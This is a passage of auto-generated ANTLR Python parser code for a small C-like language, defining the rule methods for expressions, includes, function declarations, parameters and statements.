self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
self.state = 201
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 202
self.match(SmallCParser.T__11)
self.state = 203
self.oplevel2()
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
self.state = 204
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 205
self.match(SmallCParser.T__12)
self.state = 206
self.oplevel2()
pass
elif la_ == 3:
localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
self.state = 207
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 208
self.match(SmallCParser.T__13)
self.state = 209
self.oplevel2()
pass
self.state = 214
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel2Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel2(self):
return self.getTypedRuleContext(SmallCParser.Oplevel2Context,0)
def oplevel1(self):
return self.getTypedRuleContext(SmallCParser.Oplevel1Context,0)
def functionCall(self):
return self.getTypedRuleContext(SmallCParser.FunctionCallContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def typeDeclaration(self):
return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel2
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel2" ):
listener.enterOplevel2(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel2" ):
listener.exitOplevel2(self)
def oplevel2(self):
localctx = SmallCParser.Oplevel2Context(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_oplevel2)
try:
self.state = 236
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 215
self.match(SmallCParser.T__14)
self.state = 216
self.oplevel2()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 217
self.match(SmallCParser.T__15)
self.state = 218
self.oplevel2()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 219
self.match(SmallCParser.T__9)
self.state = 220
self.oplevel2()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 221
self.match(SmallCParser.T__10)
self.state = 222
self.oplevel2()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 223
self.match(SmallCParser.T__16)
self.state = 224
self.oplevel1(0)
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 225
self.match(SmallCParser.T__11)
self.state = 226
self.oplevel2()
pass
elif la_ == 7:
self.enterOuterAlt(localctx, 7)
self.state = 227
self.match(SmallCParser.T__17)
self.state = 228
self.oplevel2()
pass
elif la_ == 8:
self.enterOuterAlt(localctx, 8)
self.state = 229
self.functionCall()
pass
elif la_ == 9:
self.enterOuterAlt(localctx, 9)
self.state = 230
self.match(SmallCParser.LBRA)
self.state = 231
self.typeDeclaration()
self.state = 232
self.match(SmallCParser.RBRA)
self.state = 233
self.oplevel2()
pass
elif la_ == 10:
self.enterOuterAlt(localctx, 10)
self.state = 235
self.oplevel1(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel1Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(SmallCParser.VariableContext,0)
def floatLiteral(self):
return self.getTypedRuleContext(SmallCParser.FloatLiteralContext,0)
def integerLiteral(self):
return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext,0)
def characterLiteral(self):
return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext,0)
def stringLiteral(self):
return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def oplevel1(self):
return self.getTypedRuleContext(SmallCParser.Oplevel1Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel1
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel1" ):
listener.enterOplevel1(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel1" ):
listener.exitOplevel1(self)
def oplevel1(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel1Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 28
self.enterRecursionRule(localctx, 28, self.RULE_oplevel1, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 248
token = self._input.LA(1)
if token in [SmallCParser.IDENTIFIER]:
self.state = 239
self.variable()
elif token in [SmallCParser.FLOAT]:
self.state = 240
self.floatLiteral()
elif token in [SmallCParser.INTEGER]:
self.state = 241
self.integerLiteral()
elif token in [SmallCParser.CHARACTER]:
self.state = 242
self.characterLiteral()
elif token in [SmallCParser.STRING]:
self.state = 243
self.stringLiteral()
elif token in [SmallCParser.LBRA]:
self.state = 244
self.match(SmallCParser.LBRA)
self.state = 245
self.expression()
self.state = 246
self.match(SmallCParser.RBRA)
else:
raise NoViableAltException(self)
self._ctx.stop = self._input.LT(-1)
self.state = 261
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 259
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,14,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
self.state = 250
if not self.precpred(self._ctx, 9):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 9)")
self.state = 251
self.match(SmallCParser.T__14)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
self.state = 252
if not self.precpred(self._ctx, 8):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 8)")
self.state = 253
self.match(SmallCParser.T__15)
pass
elif la_ == 3:
localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
self.state = 254
if not self.precpred(self._ctx, 7):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 7)")
self.state = 255
self.match(SmallCParser.LSBRA)
self.state = 256
self.expression()
self.state = 257
self.match(SmallCParser.RSBRA)
pass
self.state = 263
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class ProgramContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def include(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.IncludeContext)
else:
return self.getTypedRuleContext(SmallCParser.IncludeContext,i)
def functionDeclaration(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.FunctionDeclarationContext)
else:
return self.getTypedRuleContext(SmallCParser.FunctionDeclarationContext,i)
def functionDefinition(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.FunctionDefinitionContext)
else:
return self.getTypedRuleContext(SmallCParser.FunctionDefinitionContext,i)
def variableDeclaration(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.VariableDeclarationContext)
else:
return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_program
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterProgram" ):
listener.enterProgram(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitProgram" ):
listener.exitProgram(self)
def program(self):
localctx = SmallCParser.ProgramContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_program)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 272
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__19) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0):
self.state = 270
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
self.state = 264
self.include()
pass
elif la_ == 2:
self.state = 265
self.functionDeclaration()
pass
elif la_ == 3:
self.state = 266
self.functionDefinition()
pass
elif la_ == 4:
self.state = 267
self.variableDeclaration()
self.state = 268
self.match(SmallCParser.T__18)
pass
self.state = 274
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LABRA(self):
return self.getToken(SmallCParser.LABRA, 0)
def stdInclude(self):
return self.getTypedRuleContext(SmallCParser.StdIncludeContext,0)
def RABRA(self):
return self.getToken(SmallCParser.RABRA, 0)
def customInclude(self):
return self.getTypedRuleContext(SmallCParser.CustomIncludeContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_include
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInclude" ):
listener.enterInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInclude" ):
listener.exitInclude(self)
def include(self):
localctx = SmallCParser.IncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_include)
try:
self.state = 282
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 275
self.match(SmallCParser.T__19)
self.state = 276
self.match(SmallCParser.LABRA)
self.state = 277
self.stdInclude()
self.state = 278
self.match(SmallCParser.RABRA)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 280
self.match(SmallCParser.T__19)
self.state = 281
self.customInclude()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StdIncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.IdentifierContext)
else:
return self.getTypedRuleContext(SmallCParser.IdentifierContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_stdInclude
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStdInclude" ):
listener.enterStdInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStdInclude" ):
listener.exitStdInclude(self)
def stdInclude(self):
localctx = SmallCParser.StdIncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_stdInclude)
try:
self.enterOuterAlt(localctx, 1)
self.state = 284
self.identifier()
self.state = 285
self.match(SmallCParser.T__20)
self.state = 286
self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CustomIncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def stringLiteral(self):
return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_customInclude
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCustomInclude" ):
listener.enterCustomInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCustomInclude" ):
listener.exitCustomInclude(self)
def customInclude(self):
localctx = SmallCParser.CustomIncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_customInclude)
try:
self.enterOuterAlt(localctx, 1)
self.state = 288
self.stringLiteral()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctionDeclarationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def parameters(self):
return self.getTypedRuleContext(SmallCParser.ParametersContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_functionDeclaration
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctionDeclaration" ):
listener.enterFunctionDeclaration(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctionDeclaration" ):
listener.exitFunctionDeclaration(self)
def functionDeclaration(self):
localctx = SmallCParser.FunctionDeclarationContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_functionDeclaration)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 291
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 290
self.declarationSpecifier()
self.state = 293
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 298
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 295
self.pointerPart()
self.state = 300
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 301
self.identifier()
self.state = 302
self.match(SmallCParser.LBRA)
self.state = 303
self.parameters()
self.state = 304
self.match(SmallCParser.RBRA)
self.state = 305
self.match(SmallCParser.T__18)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctionDefinitionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def parameters(self):
return self.getTypedRuleContext(SmallCParser.ParametersContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_functionDefinition
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctionDefinition" ):
listener.enterFunctionDefinition(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctionDefinition" ):
listener.exitFunctionDefinition(self)
def functionDefinition(self):
localctx = SmallCParser.FunctionDefinitionContext(self, self._ctx, self.state)
self.enterRule(localctx, 40, self.RULE_functionDefinition)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 308
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 307
self.declarationSpecifier()
self.state = 310
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 315
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 312
self.pointerPart()
self.state = 317
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 318
self.identifier()
self.state = 319
self.match(SmallCParser.LBRA)
self.state = 320
self.parameters()
self.state = 321
self.match(SmallCParser.RBRA)
self.state = 322
self.statements()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ParametersContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def parameter(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ParameterContext)
else:
return self.getTypedRuleContext(SmallCParser.ParameterContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_parameters
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParameters" ):
listener.enterParameters(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParameters" ):
listener.exitParameters(self)
def parameters(self):
localctx = SmallCParser.ParametersContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_parameters)
self._la = 0 # Token type
try:
self.state = 334
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,24,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 325
self.parameter()
self.state = 330
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 326
self.match(SmallCParser.COMMA)
self.state = 327
self.parameter()
self.state = 332
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ParameterContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def arrayPart(self):
return self.getTypedRuleContext(SmallCParser.ArrayPartContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_parameter
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParameter" ):
listener.enterParameter(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParameter" ):
listener.exitParameter(self)
def parameter(self):
localctx = SmallCParser.ParameterContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_parameter)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 337
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 336
self.declarationSpecifier()
self.state = 339
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 344
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 341
self.pointerPart()
self.state = 346
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 348
_la = self._input.LA(1)
if _la==SmallCParser.IDENTIFIER:
self.state = 347
self.identifier()
self.state = 351
_la = self._input.LA(1)
if _la==SmallCParser.LSBRA:
self.state = 350
self.arrayPart()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PointerPartContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def pointer(self):
return self.getTypedRuleContext(SmallCParser.PointerContext,0)
def cvQualifier(self):
return self.getTypedRuleContext(SmallCParser.CvQualifierContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_pointerPart
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPointerPart" ):
listener.enterPointerPart(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPointerPart" ):
listener.exitPointerPart(self)
def pointerPart(self):
localctx = SmallCParser.PointerPartContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_pointerPart)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 353
self.pointer()
self.state = 355
_la = self._input.LA(1)
if _la==SmallCParser.CONST:
self.state = 354
self.cvQualifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArrayPartContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LSBRA(self):
return self.getToken(SmallCParser.LSBRA, 0)
def RSBRA(self):
return self.getToken(SmallCParser.RSBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_arrayPart
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterArrayPart" ):
listener.enterArrayPart(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitArrayPart" ):
listener.exitArrayPart(self)
def arrayPart(self):
localctx = SmallCParser.ArrayPartContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_arrayPart)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 357
self.match(SmallCParser.LSBRA)
self.state = 359
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 358
self.expression()
self.state = 361
self.match(SmallCParser.RSBRA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StatementsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LCBRA(self):
return self.getToken(SmallCParser.LCBRA, 0)
def RCBRA(self):
return self.getToken(SmallCParser.RCBRA, 0)
def statement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.StatementContext)
else:
return self.getTypedRuleContext(SmallCParser.StatementContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_statements
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatements" ):
listener.enterStatements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatements" ):
listener.exitStatements(self)
def statements(self):
localctx = SmallCParser.StatementsContext(self, self._ctx, self.state)
self.enterRule(localctx, 50, self.RULE_statements)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 363
self.match(SmallCParser.LCBRA)
self.state = 367
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.T__18) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.LCBRA) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST) | (1 << SmallCParser.IF) | (1 << SmallCParser.DO) | (1 << SmallCParser.WHILE) | (1 << SmallCParser.FOR) | (1 << SmallCParser.RETURN) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 364
self.statement()
self.state = 369
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 370
self.match(SmallCParser.RCBRA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StatementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def ifCond(self):
return self.getTypedRuleContext(SmallCParser.IfCondContext,0)
def whileCond(self):
return self.getTypedRuleContext(SmallCParser.WhileCondContext,0)
def doWhileCond(self):
return self.getTypedRuleContext(SmallCParser.DoWhileCondContext,0)
def forLoop(self):
return self.getTypedRuleContext(SmallCParser.ForLoopContext,0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def variableDeclaration(self):
return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,0)
def returnStmt(self):
return self.getTypedRuleContext(SmallCParser.ReturnStmtContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatement" ):
listener.enterStatement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatement" ):
listener.exitStatement(self)
def statement(self):
localctx = SmallCParser.StatementContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_statement)
try:
self.state = 387
token = self._input.LA(1)
if token in [SmallCParser.LCBRA]:
self.enterOuterAlt(localctx, 1)
self.state = 372
self.statements()
elif token in [SmallCParser.IF]:
self.enterOuterAlt(localctx, 2)
self.state = 373
self.ifCond()
elif token in [SmallCParser.WHILE]:
self.enterOuterAlt(localctx, 3)
self.state = 374
self.whileCond()
elif token in [SmallCParser.DO]:
self.enterOuterAlt(localctx, 4)
self.state = 375
self.doWhileCond()
elif token in [SmallCParser.FOR]:
self.enterOuterAlt(localctx, 5)
self.state = 376
self.forLoop()
elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
self.enterOuterAlt(localctx, 6)
self.state = 377
self.expression()
self.state = 378
self.match(SmallCParser.T__18)
elif token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
self.enterOuterAlt(localctx, 7)
self.state = 380
self.variableDeclaration()
self.state = 381
self.match(SmallCParser.T__18)
elif token in [SmallCParser.RETURN]:
self.enterOuterAlt(localctx, 8)
self.state = 383
self.returnStmt()
self.state = 384
self.match(SmallCParser.T__18)
elif token in [SmallCParser.T__18]:
self.enterOuterAlt(localctx, 9)
self.state = 386
self.match(SmallCParser.T__18)
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExpressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(SmallCParser.VariableContext,0)
def floatLiteral(self):
return self.getTypedRuleContext(SmallCParser.FloatLiteralContext,0)
def integerLiteral(self):
